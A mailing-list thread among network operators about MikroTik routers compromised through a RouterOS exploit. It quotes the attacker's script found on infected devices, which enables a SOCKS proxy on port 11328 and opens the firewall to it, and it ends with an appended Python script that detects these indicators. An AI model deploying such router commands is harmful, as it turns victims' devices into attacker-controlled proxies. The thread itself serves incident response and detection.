One of the benefits of using a configuration management tool like RANCID is that it sends out an email saying the configuration was changed and what the modifications were.  We had one older router that was compromised and I saw the changes in the RANCID email and took immediate action to close that hole.

Roy

On 8/6/2018 4:48 AM, Scott Reed via Mikrotik-users wrote:

Right. 

I wanted to make sure people know that there are lots of things that may or may not be impacted if a device is infected.  You either have to totally delete the configuration and restore from backup or you need to go through every menu item and make sure they have not been changed.


On 8/6/2018 6:55, Tim wrote:

This has been detected in devices with earlier versions of ROS. 

From: [email protected] <[email protected]> On Behalf Of Scott Reed via Mikrotik-users
Sent: Monday, August 6, 2018 5:58 AM
To: [email protected]
Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

It will also change device identity, change admin password, add Admin, add 5 firewall filter rules to redirect forward traffic, change DNS server, enable DDNS, add IP Web Proxy rules and more, but that is all I remember off the top of my head.

On 8/5/2018 20:57, Bob Pensworth via Mikrotik-users wrote:

We are finding an IP/Socks connection:

We are finding an event entry in System/Scheduler

And the (below) script in System/Script:

/ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];
/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;
/ip socks access remove [/ip socks access find];
/ip firewall filter add chain=input protocol=tcp port=11328 action="" comment="port 11328";
/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1;

--

Bob Pensworth, WA7BOB | General Manager

CresComm WiFi, LLC | (360) 928-0000, x1

From: [email protected] <[email protected]> On Behalf Of Shawn C. Peppers via Mikrotik-users
Sent: Friday, March 16, 2018 11:54 AM
To: [email protected]; [email protected]
Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27

I have not tested this yet but....

https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow

:: // Shawn Peppers

_______________________________________________
Mikrotik-users mailing list
[email protected]
http://lists.wispa.org/mailman/listinfo/mikrotik-users

-- 
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained

-- 
Scott Reed
SBRConsulting, LLC
Network and Wireless Consulting
WISPA Vendor Member
IN UMC Associate Lay Leader
SLI Coach Trained

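A defender-side check for the indicators described in this thread, added here as an example and not code from the thread, from MikroTik or from RANCID: it parses a RouterOS `/export` (assumed format: a `/section` header followed by `add`/`set` lines, long lines wrapped with a trailing backslash), flags the SOCKS, "port NNNN" firewall-marker, scheduler, script and DDNS indicators the posts mention, and diffs against a known-good export the way Roy's RANCID alert does. The two sample exports are constructed, not captured from a real device.

```python
import re
# Indicators from the thread: SOCKS enabled, filter rule with a "port NNNN"
# marker comment, scheduler/script entries, DDNS enabled.
INDICATORS = {
    "/ip socks": ("SOCKS proxy enabled", r"\benabled=yes\b"),
    "/ip firewall filter": ("filter rule with 'port NNNN' marker", r'comment="?port \d+'),
    "/system scheduler": ("scheduler entry", r"^add\b"),
    "/system script": ("stored script", r"^add\b"),
    "/ip cloud": ("DDNS enabled", r"\bddns-enabled=yes\b"),
}
def parse_export(text):
    """Group /export text into {section: [commands]}, re-joining wrapped lines."""
    sections, current, buf = {}, None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):          # RouterOS wraps long lines with '\'
            buf += line[:-1].rstrip() + " "
            continue
        line, buf = (buf + line).strip(), ""
        if line.startswith("/"):         # section header, e.g. "/ip socks"
            current = line
        elif line and not line.startswith("#") and current is not None:
            sections.setdefault(current, []).append(line)
    return sections

def find_indicators(export_text):
    """Return (section, description, command) for every indicator match."""
    hits = []
    for sec, cmds in parse_export(export_text).items():
        desc, pat = INDICATORS.get(sec, (None, None))
        hits.extend((sec, desc, c) for c in cmds if pat and re.search(pat, c))
    return hits

def config_drift(baseline_text, current_text):
    """RANCID-style check: commands present now but absent from the baseline."""
    base = parse_export(baseline_text)
    return {s: [c for c in cmds if c not in base.get(s, [])]
            for s, cmds in parse_export(current_text).items()
            if not set(cmds) <= set(base.get(s, []))}
# Constructed sample exports (not captured from a real device).
BASELINE = """/ip socks
set enabled=no
/ip firewall filter
add action=accept chain=input comment=mgmt dst-port=8291 protocol=tcp"""
COMPROMISED = BASELINE.replace("set enabled=no", "set enabled=yes port=11328") + """
add action=accept chain=input comment="port 11328" \\
    port=11328 protocol=tcp
/system scheduler
add interval=1d name=sched on-event=script1 start-time=startup"""
```

Run `find_indicators` and `config_drift` against a scheduled export of each router; an empty result from both is the expected steady state, and anything else is worth the same immediate attention Roy describes.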